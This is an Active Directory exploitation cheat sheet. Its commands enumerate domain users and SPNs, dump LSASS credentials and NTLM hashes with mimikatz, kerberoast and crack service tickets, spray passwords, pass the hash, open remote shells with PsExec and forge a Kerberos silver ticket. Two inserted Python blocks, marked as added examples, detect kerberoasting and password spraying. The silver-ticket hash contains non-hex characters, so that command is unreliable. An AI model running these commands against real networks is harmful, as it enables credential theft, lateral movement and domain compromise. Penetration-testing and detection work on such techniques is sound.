All Commands, Tools & Scripts

Here is a collection of commands, tools and scripts that you can use during the exploitation of an Active Directory environment.

There are 2 popular versions of the mimikatz tool that work with different versions of Windows: 2.1.1 and 2.2.0. I am yet to figure out the compatible versions, and once I have them figured out I will list them here. Until then, if you get an error while trying to list passwords and tickets, switch versions and try again.

List of users & groups within the local system

net user
net group

List of users and groups within the domain

In order to be able to list the users and groups from the domain, you should be logged in as a user of that domain.

net user /domain
net group /domain

Details about a user - password profile, groups, etc.

net user alice /domain

List of users and their attributes

List of Logged in users

The PowerView script from GitHub can be used to list logged-in users.

Import-Module .\PowerView.ps1
Get-NetLoggedon -ComputerName p42176 #for locally logged in users
Get-NetSession -ComputerName p42 #for domain logged in users

Alternatively, the PsLoggedon executable can be used to retrieve the list when PowerView does not work due to permissions.

.\PsLoggedon.exe \\systemname

List of SPNs in the domain

Service Principal Names are names given to services that are hosted from within the domain. Enumerating them will give us the IP address and port of those services along with a list of other details.

The same script used for enumerating users and attributes can be used for SPNs with a slight modification.

Change the $Search.filter="samAccountType=805306368" to $Search.filter="serviceprincipalname=*http*"

Alternatively, the Get-SPN script can also be used.

Get-SPN -type service -search "*http*"

The native Windows tool setspn can also be used to get the list of SPNs.

setspn -L iis_service

Retrieve User Password Hash from LSASS

We will use the mimikatz executable to retrieve the password hashes. You need at least local administrator privilege to get the passwords.

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

List local users and NTLM Hash

This command can be used to list the local users along with their NTLM hashes. It is all the more useful once you gain access to a domain controller, where it lists all users belonging to that domain.

mimikatz.exe
privilege::debug
lsadump::lsa /patch

Retrieve TGT and TGS of Users & Services

The TGT and TGS of logged in users are stored in the LSASS.

mimikatz.exe
privilege::debug
sekurlsa::tickets

Export TGS to the drive & Crack it

We can export the TGS to the drive and then use John or Hashcat to crack the file. The mimikatz procedure is as follows; you will need to know the SPN to retrieve its ticket.

# PowerShell commands
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/p42http.p42.com'

# Mimikatz tool
mimikatz.exe
privilege::debug
kerberos::list /export

Once the ticket is exported, it can be cracked using tgsrepcrack,

python /usr/share/kerberoast/tgsrepcrack.py rockyou.txt HTTP~p42http.p42.com-CORP.COM.kirbi

Invoke-Kerberoast

Invoke-Kerberoast is a PowerShell script that takes care of identifying SPNs and exporting the ticket hashes end-to-end.

Invoke-Kerberoast -OutputFormat hashcat | fl

Once you have the file in hashcat format, the file can be cracked using hashcat,

hashcat -m 13100 -a 0 -o cracked.txt file.kirbi /usr/share/seclists/Passwords/Common-Credentials/file.txt
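From the defender's side, the ticket requests made above land on the domain controller as Event ID 4769 service-ticket requests with RC4 (0x17) encryption for user-account SPNs. The detection below is an added example, not code from the original page; the 4769 field layout and the sample events are constructed.

```python
"""Kerberoasting detection over Kerberos service-ticket (Event ID 4769) records.

Added example, not part of the original cheat sheet. The tuple layout and the
sample events are constructed; a real 4769 event carries these values as
IpAddress, TargetUserName, ServiceName, TicketEncryptionType and Status.
"""
from collections import defaultdict

# Constructed sample 4769 records: (client_ip, requesting_user, service_name, enc_type, status)
EVENTS_4769 = [
    ("10.0.0.5",  "alice@P42.COM", "WEB01$",      0x12, 0x0),   # AES256 for a machine SPN: normal
    ("10.0.0.5",  "alice@P42.COM", "krbtgt",      0x12, 0x0),   # TGT-related, ignored
    ("10.0.0.77", "bob@P42.COM",   "iis_service", 0x17, 0x0),   # RC4 for a user SPN
    ("10.0.0.77", "bob@P42.COM",   "sql_svc",     0x17, 0x0),
    ("10.0.0.77", "bob@P42.COM",   "backup_svc",  0x17, 0x0),
    ("10.0.0.9",  "carol@P42.COM", "sql_svc",     0x12, 0x0),   # AES request: normal
    ("10.0.0.9",  "carol@P42.COM", "sql_svc",     0x17, 0x1b),  # failed, KDC_ERR_ETYPE_NOSUPP
]

RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC


def is_roastable_request(service, enc_type, status):
    """True for a successful RC4 ticket for a user (non-machine, non-krbtgt) SPN."""
    return (enc_type == RC4_HMAC and status == 0x0
            and not service.endswith("$") and service.lower() != "krbtgt")


def kerberoast_suspects(events, min_distinct_services=2):
    """Group RC4 user-SPN ticket requests by (client_ip, user) and return the
    requesters that pulled tickets for several different service accounts."""
    per_requester = defaultdict(set)
    for ip, user, service, enc, status in events:
        if is_roastable_request(service, enc, status):
            per_requester[(ip, user)].add(service)
    return {k: sorted(v) for k, v in per_requester.items()
            if len(v) >= min_distinct_services}


if __name__ == "__main__":
    for (ip, user), services in kerberoast_suspects(EVENTS_4769).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

Forcing AES on service accounts (so the RC4 request fails as in the last sample event) shrinks the roastable surface and makes the remaining RC4 requests stand out.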
Slow User Password Guessing

One of the ways, though not the most effective, is to attempt logins with guessed passwords. We can automate this process using PowerShell scripts. However, one thing to keep in mind is the number of wrong passwords after which an account will be locked. We can find it with:

net accounts

Lockout threshold and lockout observation window are the 2 parameters to keep in mind before starting this attack.

We can use the DomainPasswordSpray script to try and guess the user password:

Import-Module DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Spring2017
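The lockout threshold and observation window above are also what a defender keys on to spot a spray: many distinct accounts failing from one source inside a single observation window, each staying below the threshold. The following is an added example, not code from the original page; it parses a constructed `net accounts` excerpt and flags that pattern in constructed failed-logon records.

```python
"""Password-spray detection keyed on the domain lockout policy.

Added example, not part of the original cheat sheet. The `net accounts` text and
the failed-logon records are constructed; the record fields mirror what Event ID
4771 (Kerberos pre-auth failed) or 4625 carry: time, source IP, target user.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed excerpt of `net accounts` output (the two values the text says to check)
NET_ACCOUNTS_OUTPUT = """\
Lockout threshold:                                    5
Lockout observation window (minutes):                 30
"""


def parse_lockout_policy(text):
    """Return (threshold or None when 'Never', observation window in minutes)."""
    thr = re.search(r"Lockout threshold:\s+(\S+)", text).group(1)
    win = re.search(r"Lockout observation window \(minutes\):\s+(\d+)", text).group(1)
    return (None if thr == "Never" else int(thr)), int(win)


# Constructed failed-logon records: (time, source_ip, target_user)
T0 = datetime(2024, 1, 1, 9, 0)
FAILED_LOGONS = [(T0 + timedelta(minutes=i), "10.0.0.77", u)
                 for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
FAILED_LOGONS += [(T0 + timedelta(seconds=s), "10.0.0.9", "alice") for s in (0, 20, 45)]


def spray_sources(records, threshold, window_minutes, min_accounts=5):
    """Flag source IPs that fail against many distinct accounts inside one observation
    window while keeping every account below the lockout threshold (the spray shape)."""
    by_ip = defaultdict(list)
    for t, ip, user in records:
        by_ip[ip].append((t, user))
    window = timedelta(minutes=window_minutes)
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):      # slide a window from each attempt
            per_user = defaultdict(int)
            for t, u in attempts[i:]:
                if t - start <= window:
                    per_user[u] += 1
            below = threshold is None or max(per_user.values()) < threshold
            if len(per_user) >= min_accounts and below:
                flagged[ip] = sorted(per_user)
                break
    return flagged
```

The source 10.0.0.9 (one account, three tries) is the fat-finger case and is not flagged; 10.0.0.77 touches six accounts once each and is.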

Windows Login with NTLM Hash

This works only with the NTLM hash of AD admin accounts and built-in local admin accounts. It is merely a replacement for logging in with a password.

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.1 cmd

Use user NTLM Hash to open application

This works when another user is logged on to the system using NTLM and you would like to start an application in that user's context. Here we will get a ticket for PowerShell and open the PowerShell application.

Ensure that a user already has a session using NTLM and get the password hash as shown under the section "Retrieve User Password Hash from LSASS".

Then use the following commands to get a Kerberos ticket for PowerShell:

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:p42.com /ntlm:e2b475c31da2a5738190f67ae965c227 /run:PowerShell.exe

With this you should have a PowerShell window open within the context of the user "administrator".

Generate TGT & TGS using Powershell Opened within User's Context

If you already have a PowerShell window open within the user's context, then you can request a TGT and use it to further your attack. The following command authenticates to a network share:

net use \\p42

Note: Any command that seeks the permission of the DC can be used here.

You can check the generated ticket using the command "klist".

Open a Cmd Prompt on a Remote System

In order to be able to open a command prompt on a remote system within the context of a user, you should already have a PowerShell/cmd prompt in that user's context on the local system. Then the tool PsExec.exe can be used to open the remote prompt.

.\PsExec.exe \\p42 -c cmd.exe -u <domainname\username> -p <password>

It is important to note that some systems accept only the domain name, and in that case it has to be included in the command instead of the IP address or loopback address.

Open a Cmd Prompt from the Linux System

This is the Linux equivalent of PsExec on Windows. It comes in handy when you have the username and password to gain command prompt control on a remote system. It requires the target machine to have SMB enabled and the user to have write access to the ADMIN$ share.

psexec.py p42/user123:hereisapassword@192.168.1.1

It is important to note that some systems accept only the domain name, and in that case it has to be included in the command instead of the IP address or loopback address.

Crafting a Silver Ticket in Kerberos

A silver ticket is a service ticket that is forged by the user rather than obtained from the KDC using a TGT. We will need the password hash of the service account that runs the service and the Security Identifier (SID) of the user's domain.

The SID can be viewed using the following command:

whoami /user

Then the ticket can be crafted using mimikatz:

mimikatz.exe
kerberos::purge
kerberos::list
kerberos::golden /user:user1 /domain:p42.com /sid:S-1-5-21-1602849587-2789273131-2649389668 /target:httpserver.p42.com /service:HTTP /rc4:E2B4748C11DA2A07DH92749W87A992C917 /ptt

The rc4 parameter indicates the encryption algorithm to be used, and its value is the encryption key, which here is the NTLM hash of that service account. The NTLM hash can be procured for the SPN by requesting a service ticket and then cracking it. Check out the "Export TGS to the drive & Crack it" section.
